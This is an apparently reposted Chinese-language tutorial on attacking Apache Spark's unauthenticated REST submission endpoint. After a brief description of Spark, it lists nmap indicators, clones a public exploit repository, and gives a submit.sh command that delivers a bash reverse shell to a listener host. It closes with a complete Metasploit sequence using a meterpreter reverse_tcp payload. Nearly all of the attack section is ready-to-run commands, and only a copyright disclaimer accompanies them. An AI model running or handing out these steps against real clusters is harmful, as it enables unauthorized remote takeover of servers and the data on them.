spark未授權RCE漏洞


Spark簡介



spark是一個實現快速通用的集群計算平台。它是由加州大學伯克利分校AMP實驗室 開發的通用內存並行計算框架,用來構建大型的、低延遲的數據分析應用程序。它擴展了廣泛使用的MapReduce計算模型。高效的支撐更多計算模式,包括交互式查詢和流處理。spark的一個主要特點是能夠在內存中進行計算,及時依賴磁盤進行復雜的運算,Spark依然比MapReduce更加高效。

Spark未授權



信息探測


nmap掃描出先如下端口開放,則很有可能

6066/tcp open http Jetty 9.3.z-SNAPSHOT 8081/tcp open http Jetty 9.3.z-SNAPSHOT 8082/tcp open http Jetty 9.3.z-SNAPSHOT 

驗證如圖

下載攻擊組件或使用MSF


下載地址:git clone https://github.com/aRe00t/rce-over-spark.git

jar工具使用說明


./submit.sh 192.168.100.2:6066 2.3.1 https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar "bash -i >& /dev/tcp/192.168.100.1/8888 0>&1" 

反彈shell效果:

msf工具


msf5>use exploit/linux/http/spark_unauth_rce msf5>set payload java/meterpreter/reverse_tcp msf5>set rhost 192.168.100.2 msf5>set rport 6066 msf5>set lhost 192.168.100.1 msf5>set lport 4444 msf5>set srvhost 192.168.100.1 msf5>set srvport 8080 msf5>exploit 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM